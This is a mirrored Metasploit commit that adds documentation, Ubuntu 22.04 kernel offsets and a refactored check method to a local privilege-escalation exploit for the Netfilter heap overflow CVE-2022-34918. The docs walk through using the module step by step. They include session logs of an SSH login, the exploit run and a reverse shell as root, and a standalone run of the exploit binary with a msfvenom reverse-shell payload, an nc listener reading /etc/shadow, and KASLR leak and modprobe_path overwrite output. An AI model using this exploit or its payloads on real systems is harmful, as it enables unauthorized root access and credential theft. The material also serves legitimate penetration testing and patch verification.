mirror of
https://github.com/rapid7/metasploit-framework
synced 2024-10-29 18:07:27 +01:00
Add module docs, add Ubuntu 22.04 offsets, update check method
This commit is contained in:
parent
73db035e57
commit
37f1fdd47b
Binary file not shown.
@ -0,0 +1,149 @@
|
||||
## Vulnerable Application
|
||||
|
||||
This module exploits a vulnerability in Netfilter, the Linux Kernel component
|
||||
that implements firewall capabilities in Linux.
|
||||
The vulnerability is a type-confusion bug that leads to a heap overflow in kernel memory.
|
||||
The exploit relies on spraying, it may fail, or crash the target system.
|
||||
|
||||
### Install
|
||||
|
||||
The vulnerability exists in linux kernel versions from `5.8-rc1` up to `v5.19-rc5`.
|
||||
this module contains offsets for some vulnerable Ubuntu versions.
|
||||
|
||||
Install Ubuntu 22.04 LTS with a vulnerable kernel version.
|
||||
`apt-get install linux-image-5.15.0-25-generic`
|
||||
Hold shift when you reboot and select the proper kernel version
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Make an Ubuntu target.
|
||||
1. Create a Meterpreter or shell payload and upload it to the Ubuntu target. Or setup openssh-server, and use the corresponding auxiliary module.
|
||||
1. Get a session
|
||||
1. Do: `use exploit/linux/local/netfilter_nft_set_elem_init_privesc`
|
||||
1. Do: `set session <session_id>`
|
||||
1. Do: `set payload <payload>`
|
||||
1. Do: `set lhost <ip>`
|
||||
1. Do: `set [r|l]port <port>`
|
||||
1. Do: `run`
|
||||
1. You should get a new session as the `root` user.
|
||||
1. If it fails, retry, or reboot Ubuntu and retry.
|
||||
|
||||
## Options
|
||||
|
||||
### COMPILE
|
||||
|
||||
[Auto|True|False] This selects the binary to use. `True` will cause the module to upload the source
|
||||
code and perform compilation on target, `False` will cause the module to upload a precompiled binary.
|
||||
`Auto` will cause the module to try compiling the exploit on the target but will fall back to the
|
||||
precompiled option if a compiler cannot be found.
|
||||
|
||||
### WritableDir
|
||||
|
||||
This indicates the location where you would like the payload and exploit binary stored.
|
||||
The default value is `/tmp`
|
||||
|
||||
Due to the exploitation strategy that this module relies on, `/tmp` must be writable, even if
|
||||
`WritableDir` is a different directory. `modprobe_path` gets overwritten with a path to a file
|
||||
in `/tmp`. This file is a bash script that adds the setuid bit to the payload uploaded at
|
||||
`WritableDir`.
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Ubuntu 21.10 x64 With Linux 5.13.0.37-Generic
|
||||
|
||||
```
|
||||
msf6 > use auxiliary/scanner/ssh/ssh_login
|
||||
msf6 auxiliary(scanner/ssh/ssh_login) > set rhosts 192.168.0.40
|
||||
rhosts => 192.168.0.40
|
||||
msf6 auxiliary(scanner/ssh/ssh_login) > set username redouane
|
||||
username => redouane
|
||||
msf6 auxiliary(scanner/ssh/ssh_login) > set password user
|
||||
password => user
|
||||
msf6 auxiliary(scanner/ssh/ssh_login) > run
|
||||
|
||||
[*] 192.168.0.40:22 - Starting bruteforce
|
||||
[+] 192.168.0.40:22 - Success: 'redouane:user' 'uid=1000(redouane) gid=1000(redouane) groupes=1000(redouane),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),134(lxd),135(sambashare) Linux hopeful-zhukovky 5.15.0-25-generic #25-Ubuntu SMP Wed Mar 30 15:54:22 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux '
|
||||
[*] SSH session 1 opened (192.168.0.32:46499 -> 192.168.0.40:22) at 2022-07-22 02:44:56 +0200
|
||||
[*] Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
msf6 auxiliary(scanner/ssh/ssh_login) > use exploit/linux/local/netfilter_nft_set_elem_init_privesc
|
||||
[*] Using configured payload linux/x64/shell_reverse_tcp
|
||||
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > set lhost wlan0
|
||||
lhost => wlan0
|
||||
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > set session 1
|
||||
session => 1
|
||||
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > run
|
||||
|
||||
[!] SESSION may not be compatible with this module:
|
||||
[!] * incompatible session architecture:
|
||||
[*] Started reverse TCP handler on 192.168.0.32:4444
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[+] The target appears to be vulnerable.
|
||||
[*] Dropping pre-compiled binaries to system...
|
||||
[*] Writing '/tmp/z9G2XJ' (761240 bytes) ...
|
||||
[*] Uploading payload...
|
||||
[*] Writing '/tmp/AsfKz' (248 bytes) ...
|
||||
[*] Running payload on remote system...
|
||||
[+] Deleted /tmp/z9G2XJ
|
||||
[+] Deleted /tmp/AsfKz
|
||||
[*] Command shell session 2 opened (192.168.0.32:4444 -> 192.168.0.40:35956) at 2022-07-22 02:45:54 +0200
|
||||
|
||||
id
|
||||
[*] Payload executed! If it was successful, a session should have been created
|
||||
|
||||
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),134(lxd),135(sambashare),1000(redouane)
|
||||
```
|
||||
|
||||
## Notes
|
||||
|
||||
### Included Binaries
|
||||
The binary used by this exploit `data/exploits/CVE-2022-34918/ubuntu.elf` can be used separately from
|
||||
Metasploit. The binary takes a single argument which is the payload or executable you wish to launch as `root`.
|
||||
|
||||
The exploit adds the setuid bit to the payload, the path given must be absolute, avoid binaries that don't run
|
||||
when the setuid bit is detected.
|
||||
|
||||
Also, the exploit process forks, gets its child to execute the setuid payload binary, and exits
|
||||
(it doesn't call `wait` or `waitpid`). For this reason, don't expect the binary to read input from standard input.
|
||||
|
||||
The following snippet shows an example of how one might run a payload to get
|
||||
a new Bash shell as the `root` user.
|
||||
|
||||
```
|
||||
redouane@wizardly-maxwell:~$ id
|
||||
uid=1000(redouane) gid=1000(redouane) groups=1000(redouane),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),134(lxd),135(sambashare)
|
||||
redouane@wizardly-maxwell:~$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=127.0.0.1 LPORT=1337 PrependSetresuid=true PrependSetresgid=true -f elf -o payload
|
||||
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
|
||||
[-] No arch selected, selecting arch: x64 from the payload
|
||||
No encoder specified, outputting raw payload
|
||||
Payload size: 96 bytes
|
||||
Final size of elf file: 216 bytes
|
||||
Saved as: payload
|
||||
redouane@wizardly-maxwell:~$ chmod +x payload
|
||||
redouane@wizardly-maxwell:~$ (echo id; head -n 2 /etc/shadow) | nc -lvvp1337 &
|
||||
[1] 2272
|
||||
redouane@wizardly-maxwell:~$ Listening on 0.0.0.0 1337
|
||||
|
||||
redouane@wizardly-maxwell:~$ ./ubuntu.elf /home/redouane/payload
|
||||
[+] kernel version '5.15.0-25-generic #25-Ubuntu' detected
|
||||
[+] Second process currently waiting
|
||||
[+] Get CAP_NET_ADMIN capability
|
||||
[+] Netlink socket created
|
||||
[+] Netlink socket bound
|
||||
[+] Table table created
|
||||
[+] Set for the leak created
|
||||
[+] Set for write primitive created
|
||||
[*] Leak in process
|
||||
[+] Leak succeed
|
||||
[+] kaslr base found 0xffffffff9f000000
|
||||
[+] physmap base found 0xffff910a00000000
|
||||
[+] modprobe path changed !
|
||||
[+] Modprobe payload setup
|
||||
[?] waitpid
|
||||
[?] sem_post
|
||||
[+++] Got root shell, should exit?
|
||||
Connection received on localhost 56962
|
||||
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),134(lxd),135(sambashare),1000(redouane)
|
||||
root:!:19193:0:99999:7:::
|
||||
daemon:*:19101:0:99999:7:::
|
||||
```
|
@ -26,5 +26,5 @@ obj:
|
||||
mkdir obj
|
||||
|
||||
clean:
|
||||
rm -rf obj/*.o
|
||||
rm -rf obj
|
||||
rm -f $(TARGET)
|
||||
|
@ -13,9 +13,24 @@
|
||||
|
||||
struct kernel_info kernels[] = {
|
||||
// 22.04 LTS
|
||||
{ "5.15.0-39-generic #42-Ubuntu", 0x3dfa00, 0x3e04f0, 0x1e8b620 },
|
||||
{ "5.15.0-40-generic #43-Ubuntu", 0x3dfa00, 0x3e04f0, 0x1e8b620 },
|
||||
{ "5.15.0-24-lowlatency #24-Ubuntu", 0x3e68a0, 0x3e7690, 0x1e8c320 },
|
||||
{ "5.15.0-25-generic #25-Ubuntu", 0x3dda20, 0x3de520, 0x1e8b3a0 },
|
||||
{ "5.15.0-27-generic #28-Ubuntu", 0x3ddaf0, 0x3de5f0, 0x1e8b320 },
|
||||
{ "5.15.0-27-lowlatency #28-Ubuntu", 0x3e6970, 0x3e7760, 0x1e8c2a0 },
|
||||
{ "5.15.0-30-generic #31-Ubuntu", 0x3dea40, 0x3df540, 0x1e8b460 },
|
||||
{ "5.15.0-30-lowlatency #31-Ubuntu", 0x3e78b0, 0x3e86a0, 0x1e8c3e0 },
|
||||
{ "5.15.0-33-generic #34-Ubuntu", 0x3dea40, 0x3df540, 0x1e8b460 },
|
||||
{ "5.15.0-33-lowlatency #34-Ubuntu", 0x3e78c0, 0x3e86b0, 0x1e8c3e0 },
|
||||
{ "5.15.0-35-generic #36-Ubuntu", 0x3dfa00, 0x3e04f0, 0x1e8b560 },
|
||||
{ "5.15.0-35-lowlatency #36-Ubuntu", 0x3e88d0, 0x3e96b0, 0x1e8c4e0 },
|
||||
{ "5.15.0-37-generic #39-Ubuntu", 0x3dfa00, 0x3e04f0, 0x1e8b560 },
|
||||
{ "5.15.0-37-lowlatency #39-Ubuntu", 0x3e88d0, 0x3e96b0, 0x1e8c4e0 },
|
||||
{ "5.15.0-39-generic #42-Ubuntu", 0x3dfa00, 0x3e04f0, 0x1e8b620 },
|
||||
{ "5.15.0-39-lowlatency #42-Ubuntu", 0x3e88d0, 0x3e96b0, 0x1e8c5a0 },
|
||||
{ "5.15.0-40-generic #43-Ubuntu", 0x3dfa00, 0x3e04f0, 0x1e8b620 },
|
||||
{ "5.15.0-40-lowlatency #43-Ubuntu", 0x3e88d0, 0x3e96b0, 0x1e8c5a0 },
|
||||
{ "5.15.0-41-generic #44-Ubuntu", 0x3e00a0, 0x3e0b90, 0x1e8b660 },
|
||||
{ "5.15.0-41-lowlatency #44-Ubuntu", 0x3e8f70, 0x3e9d50, 0x1e8c5e0 },
|
||||
// Ubuntu 20.04.4 LTS
|
||||
{ "5.11.0-41-generic #45~20.04.1-Ubuntu", 0x37db60, 0x389a80, 0x1c6c2e0 },
|
||||
{ "5.11.0-44-generic #48~20.04.2-Ubuntu", 0x37de70, 0x389a90, 0x1c6c2e0 },
|
||||
|
@ -90,7 +90,7 @@ class MetasploitModule < Msf::Exploit::Local
|
||||
def run_payload
|
||||
info = cmd_exec(@executable_path, @payload_path)
|
||||
info.each_line do |line|
|
||||
print_status(line)
|
||||
print_status(line.chomp)
|
||||
end
|
||||
print_status('Payload executed! If it was successful, a session should have been created')
|
||||
end
|
||||
@ -106,35 +106,18 @@ class MetasploitModule < Msf::Exploit::Local
|
||||
|
||||
def check
|
||||
config = kernel_config
|
||||
if config.nil?
|
||||
vprint_error 'Could not retrieve kernel config'
|
||||
return CheckCode::Unknown
|
||||
end
|
||||
|
||||
unless config.include? 'CONFIG_USER_NS=y'
|
||||
vprint_error 'Kernel config does not include CONFIG_USER_NS'
|
||||
return CheckCode::Safe
|
||||
end
|
||||
vprint_good 'Kernel config has CONFIG_USER_NS enabled'
|
||||
return CheckCode::Unknown('Could not retrieve kernel config') if config.nil?
|
||||
|
||||
unless userns_enabled?
|
||||
vprint_error 'Unprivileged user namespaces are not permitted'
|
||||
return CheckCode::Safe
|
||||
end
|
||||
vprint_good 'Unprivileged user namespaces are permitted'
|
||||
return CheckCode::Safe('Kernel config does not include CONFIG_USER_NS') unless config.include?('CONFIG_USER_NS=y')
|
||||
|
||||
if lkrg_installed?
|
||||
vprint_error 'LKRG is installed'
|
||||
return CheckCode::Safe
|
||||
end
|
||||
vprint_good 'LKRG is not installed'
|
||||
return CheckCode::Safe('Unprivileged user namespaces are not permitted') unless userns_enabled?
|
||||
|
||||
return CheckCode::Safe('LKRG is installed') if lkrg_installed?
|
||||
|
||||
arch = kernel_hardware
|
||||
unless arch.include? 'x86_64'
|
||||
vprint_error "System architecture #{arch} is not supported"
|
||||
return CheckCode::Safe
|
||||
end
|
||||
vprint_good "System architecture #{arch} is supported"
|
||||
|
||||
return CheckCode::Safe("System architecture #{arch} is not supported") unless arch.include?('x86_64')
|
||||
|
||||
release = kernel_release
|
||||
version = "#{release} #{kernel_version.split(' ').first}"
|
||||
|
Loading…
Reference in New Issue
Block a user